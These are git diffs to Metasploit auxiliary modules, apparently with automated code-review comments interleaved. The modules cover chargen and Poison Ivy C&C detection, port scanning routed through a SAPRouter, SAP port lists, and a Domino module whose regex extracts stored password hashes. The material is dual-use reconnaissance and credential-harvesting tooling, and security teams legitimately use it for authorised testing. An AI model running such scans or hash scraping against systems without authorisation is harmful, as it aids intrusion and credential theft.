end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Validate a chargen packet.
|
||||||
|
#
|
||||||
|
def chargen_parse(data)
|
||||||
|
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Validate this is truly Citrix ICA; returns true or false.
|
# Validate this is truly Citrix ICA; returns true or false.
|
||||||
#
|
#
|
||||||
|
@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# The probe definitions
|
# The probe definitions
|
||||||
#
|
#
|
||||||
|
|
||||||
|
def probe_chargen(ip)
|
||||||
|
pkt = Rex::Text.rand_text_alpha_lower(1)
|
||||||
|
return [pkt, 19]
|
||||||
|
end
|
||||||
|
|
||||||
def probe_pkt_dns(ip)
|
def probe_pkt_dns(ip)
|
||||||
data = [rand(0xffff)].pack('n') +
|
data = [rand(0xffff)].pack('n') +
|
||||||
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
||||||
|
|
|
@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@probes << 'probe_pkt_citrix'
|
@probes << 'probe_pkt_citrix'
|
||||||
@probes << 'probe_pkt_pca_st'
|
@probes << 'probe_pkt_pca_st'
|
||||||
@probes << 'probe_pkt_pca_nq'
|
@probes << 'probe_pkt_pca_nq'
|
||||||
|
@probes << 'probe_chargen'
|
||||||
end
|
end
|
||||||
|
|
||||||
def setup
|
def setup
|
||||||
|
@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
case sport
|
case sport
|
||||||
|
|
||||||
|
when 19
|
||||||
|
app = 'chargen'
|
||||||
|
ver = nil
|
||||||
|
return unless chargen_parse(data)
|
||||||
|
@results[hkey] = true
|
||||||
|
|
||||||
when 53
|
when 53
|
||||||
app = 'DNS'
|
app = 'DNS'
|
||||||
ver = nil
|
ver = nil
|
||||||
|
@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
|
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Validate a chargen packet.
|
||||||
|
#
|
||||||
|
def chargen_parse(data)
|
||||||
|
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Parse a db2disco packet.
|
# Parse a db2disco packet.
|
||||||
#
|
#
|
||||||
|
@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# The probe definitions
|
# The probe definitions
|
||||||
#
|
#
|
||||||
|
|
||||||
|
def probe_chargen(ip)
|
||||||
|
pkt = Rex::Text.rand_text_alpha_lower(1)
|
||||||
|
return [pkt, 19]
|
||||||
|
end
|
||||||
|
|
||||||
def probe_pkt_dns(ip)
|
def probe_pkt_dns(ip)
|
||||||
data = [rand(0xffff)].pack('n') +
|
data = [rand(0xffff)].pack('n') +
|
||||||
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
||||||
|
|
|
@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
dead = false
|
dead = false
|
||||||
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
|
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
|
if portlist.empty?
|
||||||
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
|
end
|
||||||
|
|
||||||
vprint_status("[#{rhost}] Verifying manual testing is not required...")
|
vprint_status("[#{rhost}] Verifying manual testing is not required...")
|
||||||
|
|
||||||
manual = false
|
manual = false
|
||||||
|
|
|
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if (res and res.body)
|
if (res and res.body)
|
||||||
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
||||||
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
||||||
pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
||||||
|
|
||||||
if short_name.to_s.strip.empty?
|
if short_name.to_s.strip.empty?
|
||||||
short_name = 'NULL'
|
short_name = 'NULL'
|
||||||
|
|
|
@ -0,0 +1,101 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Poison Ivy Command and Control Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
|
||||||
|
},
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
|
||||||
|
],
|
||||||
|
'Author' => ['SeawolfRN'],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]),
|
||||||
|
OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]),
|
||||||
|
OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10])
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
deregister_options('RPORT')
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
|
||||||
|
timeout = datastore['TIMEOUT'].to_i
|
||||||
|
|
||||||
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
|
if ports.empty?
|
||||||
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
|
end
|
||||||
|
|
||||||
|
while(ports.length > 0)
|
||||||
|
t = []
|
||||||
|
r = []
|
||||||
|
begin
|
||||||
|
1.upto(datastore['CONCURRENCY']) do
|
||||||
|
this_port = ports.shift
|
||||||
|
break if not this_port
|
||||||
|
t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port|
|
||||||
|
begin
|
||||||
|
s = connect(false,
|
||||||
|
{
|
||||||
|
'RPORT' => port,
|
||||||
|
'RHOST' => ip,
|
||||||
|
'ConnectTimeout' => (timeout / 1000.0)
|
||||||
|
}
|
||||||
|
)
|
||||||
|
r << [ip,port,"open",'Unknown']
|
||||||
|
s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer
|
||||||
|
data = s.get_once(0x100)
|
||||||
|
if data.length == 0x100
|
||||||
|
data = s.get_once(0x4)
|
||||||
|
if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C
|
||||||
|
print_status("#{ip}:#{port} - C&C Server Found")
|
||||||
|
r << [ip,port,"open",'Poison Ivy C&C']
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionRefused
|
||||||
|
vprint_status("#{ip}:#{port} - TCP closed")
|
||||||
|
r << [ip,port,"closed",'']
|
||||||
|
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
|
||||||
|
rescue ::Rex::Post::Meterpreter::RequestError
|
||||||
|
raise $!
|
||||||
|
ensure
|
||||||
|
disconnect(s) rescue nil
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
t.each {|x| x.join }
|
||||||
|
|
||||||
|
rescue ::Timeout::Error
|
||||||
|
ensure
|
||||||
|
t.each {|x| x.kill rescue nil }
|
||||||
|
end
|
||||||
|
|
||||||
|
r.each do |res|
|
||||||
|
report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3])
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
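Review bot: `data == "\xD0\x15\x00\x00"` compares ASCII-8BIT socket bytes against a literal that carries the file's UTF-8 source encoding, and this file has no `# -*- coding: binary -*-` header; on Ruby 1.9+ two non-ASCII strings of different encodings are not comparable and `==` is always false, so the C&C signature would never match. Compare numerically instead, `if data && data.length == 4 && data.unpack('V').first == 0x15d0`, or add the binary coding comment as the first line. The earlier `if data.length == 0x100` also needs a nil guard, since `get_once` returns nil when the peer closes or stays silent and `NoMethodError` is not among the rescued classes. `s.puts("\x00"*0x100, 0)` looks like IO#puts, which appends a newline and then writes the literal `0` as a second line; `s.put("\x00" * 0x100)` sends exactly the 0x100-byte handshake.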
|
|
@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
||||||
|
|
|
@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
datastore['RHOST'] = datastore['BOUNCEHOST']
|
datastore['RHOST'] = datastore['BOUNCEHOST']
|
||||||
|
|
|
@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
||||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
while(ports.length > 0)
|
while(ports.length > 0)
|
||||||
|
|
|
@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
||||||
|
|
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
|
'Royce Davis "R3dy" <rdavis[at]accuvant.com>',
|
||||||
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
|
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
))
|
||||||
|
|
|
@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Auxiliary::Scanner
|
|
||||||
|
VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
|
@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']),
|
OptAddress.new('RHOST', [true, 'SAPRouter address', '']),
|
||||||
OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']),
|
OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']),
|
||||||
|
OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']),
|
||||||
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
|
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
|
||||||
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
|
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
|
||||||
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
|
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
|
||||||
|
@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
|
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
|
||||||
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
|
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
|
||||||
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
|
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
|
||||||
|
OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
deregister_options('RPORT')
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Converts a instance specification like "4,21-23,33" into a sorted,
|
# Converts a instance specification like "4,21-23,33" into a sorted,
|
||||||
|
@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
vprint_error("#{ip}:#{port} - invalid route")
|
vprint_error("#{ip}:#{port} - invalid route")
|
||||||
when /reacheable/
|
when /reacheable/
|
||||||
vprint_error("#{ip}:#{port} - unreachable")
|
vprint_error("#{ip}:#{port} - unreachable")
|
||||||
|
when /hostname '#{ip}' unknown/
|
||||||
|
vprint_error("#{ip}:#{port} - unknown host")
|
||||||
|
when /GetHostByName: '#{ip}' not found/
|
||||||
|
vprint_error("#{ip}:#{port} - unknown host")
|
||||||
|
when /connection to .* timed out/
|
||||||
|
vprint_error("#{ip}:#{port} - connection timed out")
|
||||||
|
when /partner .* not reached/
|
||||||
|
vprint_error("#{ip}:#{port} - host unreachable")
|
||||||
else
|
else
|
||||||
vprint_error("#{ip}:#{port} - unknown error message")
|
vprint_error("#{ip}:#{port} - unknown error message")
|
||||||
end
|
end
|
||||||
|
@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def validate(range)
|
||||||
|
hosts_list = range.split(",")
|
||||||
|
return false if hosts_list.nil? or hosts_list.empty?
|
||||||
|
|
||||||
|
hosts_list.each do |host|
|
||||||
|
unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
|
||||||
|
if datastore['RESOLVE'] == 'remote'
|
||||||
|
range = datastore['TARGETS']
|
||||||
|
unless validate(range)
|
||||||
|
print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
range.split(/,/).each do |host|
|
||||||
|
run_host(host)
|
||||||
|
end
|
||||||
|
else
|
||||||
|
# resolve IP or crack IP range
|
||||||
|
ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS'])
|
||||||
|
ip_list.each do |ip|
|
||||||
|
run_host(ip)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
||||||
sap_host = datastore['SAPROUTER_HOST']
|
|
||||||
sap_port = datastore['SAPROUTER_PORT']
|
|
||||||
|
|
||||||
ports = datastore['PORTS']
|
ports = datastore['PORTS']
|
||||||
|
|
||||||
# if port definition has NN then we require INSTANCES
|
# if port definition has NN then we require INSTANCES
|
||||||
|
@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = build_sap_ports(ports)
|
ports = build_sap_ports(ports)
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error('Error: No valid ports specified')
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Scanning #{ip}")
|
print_status("Scanning #{ip}")
|
||||||
|
@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
begin
|
begin
|
||||||
# create ni_packet to send to saprouter
|
# create ni_packet to send to saprouter
|
||||||
routes = {sap_host => sap_port, ip => port}
|
routes = {rhost => rport, ip => port}
|
||||||
ni_packet = build_ni_packet(routes)
|
ni_packet = build_ni_packet(routes)
|
||||||
|
|
||||||
s = connect(false,
|
s = connect(false)
|
||||||
{
|
|
||||||
'RPORT' => sap_port,
|
|
||||||
'RHOST' => sap_host
|
|
||||||
}
|
|
||||||
)
|
|
||||||
|
|
||||||
s.write(ni_packet, ni_packet.length)
|
s.write(ni_packet, ni_packet.length)
|
||||||
response = s.get()
|
response = s.get()
|
||||||
|
@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
rescue ::Rex::ConnectionRefused
|
rescue ::Rex::ConnectionRefused
|
||||||
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused")
|
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused")
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
|
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
|
||||||
rescue ::Rex::Post::Meterpreter::RequestError
|
rescue ::Rex::Post::Meterpreter::RequestError
|
||||||
|
@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
r.each do |res|
|
r.each do |res|
|
||||||
tbl << [res[0], res[1], res[2], res[3]]
|
tbl << [res[0], res[1], res[2], res[3]]
|
||||||
|
# we can't report if resolution is remote, since host is unknown locally
|
||||||
|
if datastore['RESOLVE'] == 'local'
|
||||||
|
begin
|
||||||
report_service(:host => res[0], :port => res[1], :state => res[2])
|
report_service(:host => res[0], :port => res[1], :state => res[2])
|
||||||
|
rescue ActiveRecord::RecordInvalid
|
||||||
|
# Probably raised because the Address is reserved, for example
|
||||||
|
# when trying to report a service on 127.0.0.1
|
||||||
|
print_warning("Can't report #{res[0]} as host to the database")
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
print_warning("Warning: Service info could be innacurated")
|
print_warning("Warning: Service info could be inaccurate")
|
||||||
print(tbl.to_s)
|
print(tbl.to_s)
|
||||||
|
|
||||||
end
|
end
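Review bot: `validate` never actually returns `true` — `hosts_list.each` returns the receiver, so the method yields the Array (truthy) on success or `false`, and the `hosts_list.nil?` guard is dead because `String#split` never returns nil. Replace the loop with a predicate, `hosts_list.all? { |host| Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX }`, and consider `range.split(',').map(&:strip)` so a list written as `a.example, b.example` is not rejected for the leading space. Each accepted host is later interpolated unescaped into the `when /hostname '#{ip}' unknown/` and `when /GetHostByName: '#{ip}' not found/` patterns and into the NI route string sent to the SAPRouter, so the patterns should use `Regexp.escape(ip)` and VALID_HOSTNAME_REGEX (defined outside this hunk, not visible here) should be anchored with `\A`/`\z` rather than `^`/`$` — worth confirming against its definition.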
|
||||||
|
|
|
@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
def_ports = [
|
def_ports = [
|
||||||
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
|
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
|
||||||
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
|
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
|
||||||
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975',
|
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00',
|
||||||
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200',
|
'3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08',
|
||||||
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200',
|
'3NN11', '3NN17'
|
||||||
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
|
|
||||||
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
|
|
||||||
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
|
|
||||||
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
|
|
||||||
'8353', '8366', '1090', '1095', '20201', '1099', '1089'
|
|
||||||
]
|
]
|
||||||
|
|
||||||
|
static_ports = [
|
||||||
|
'21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299',
|
||||||
|
'3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200',
|
||||||
|
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004',
|
||||||
|
'20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604',
|
||||||
|
'2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366',
|
||||||
|
'1090', '1095', '20201', '1099', '1089'
|
||||||
|
]
|
||||||
|
|
||||||
ports = []
|
ports = []
|
||||||
|
|
||||||
# Build ports array from valid instance numbers
|
# Build ports array from valid instance numbers
|
||||||
|
@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
final_ports << dport.gsub("NN", inst)
|
final_ports << dport.gsub("NN", inst)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
final_ports.push(*static_ports)
|
||||||
ports = final_ports
|
ports = final_ports
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
|
@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
print_good("#{ip}:#{port}\t - #{service} OPEN")
|
print_good("#{ip}:#{port}\t - #{service} OPEN")
|
||||||
|
|
||||||
=begin
|
begin
|
||||||
report_note(:host => "#{ip}",
|
report_note(
|
||||||
|
:host => "#{ip}",
|
||||||
:proto => 'TCP',
|
:proto => 'TCP',
|
||||||
:port => "#{port}",
|
:port => "#{port}",
|
||||||
:type => 'SAP',
|
:type => 'SAP',
|
||||||
:data => "#{service}")
|
:data => "#{service}"
|
||||||
=end
|
)
|
||||||
|
end
|
||||||
r << [ip,port,"open", service]
|
r << [ip,port,"open", service]
|
||||||
rescue ::Rex::ConnectionRefused
|
rescue ::Rex::ConnectionRefused
|
||||||
vprint_status("#{ip}:#{port}\t - TCP closed")
|
vprint_status("#{ip}:#{port}\t - TCP closed")
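Review bot: Once `final_ports.push(*static_ports)` appends the fixed port list unconditionally, the `if ports.empty?` check immediately after it can no longer be true, so the "no valid ports" error path — and the `Msf::OptionValidateError` the caller raises on an empty result — is dead, and an INSTANCES value that yields no instance ports silently scans only the static ports. The start of `build_sap_ports` is outside the hunk, so an earlier return on bad instance numbers would change this, but nothing visible here does. If the fallback is intended, say so with `# static ports are scanned even when INSTANCES yields no valid instance ports`; otherwise move the check before the push, `if final_ports.empty?` … `end` then `final_ports.push(*static_ports)`, so an invalid INSTANCES list is still reported.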
|
||||||
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# this is needed on windows cause we send interface directly to Pcap functions
|
# this is needed on windows cause we send interface directly to Pcap functions
|
||||||
@interface = get_interface_guid(@interface)
|
@interface = get_interface_guid(@interface)
|
||||||
@iface_ip = datastore['LOCALIP']
|
@iface_ip = datastore['LOCALIP']
|
||||||
@iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces
|
@iface_ip ||= get_ipv4_addr(@interface) if netifaces
|
||||||
raise "Interface IP is not defined and can not be guessed" unless @iface_ip
|
raise "Interface IP is not defined and can not be guessed" unless @iface_ip
|
||||||
|
|
||||||
# start with blank slate
|
# start with blank slate
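Review bot: `@iface_ip ||= get_ipv4_addr(@interface) if netifaces` only fires when LOCALIP is nil; in Ruby an empty string is truthy, so a LOCALIP set to `''` skips both the new lookup and the `raise` that follows, and the module proceeds with an empty interface IP. Normalise the option before the fallback, `@iface_ip = datastore['LOCALIP']` followed by `@iface_ip = nil if @iface_ip.to_s.empty?`, so the guard covers both cases. Whether `get_ipv4_addr` returns nil or an empty string on a failed lookup is not visible here and decides whether the existing `raise` still protects that path. The enclosing method starts and ends outside the hunk.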
|
||||||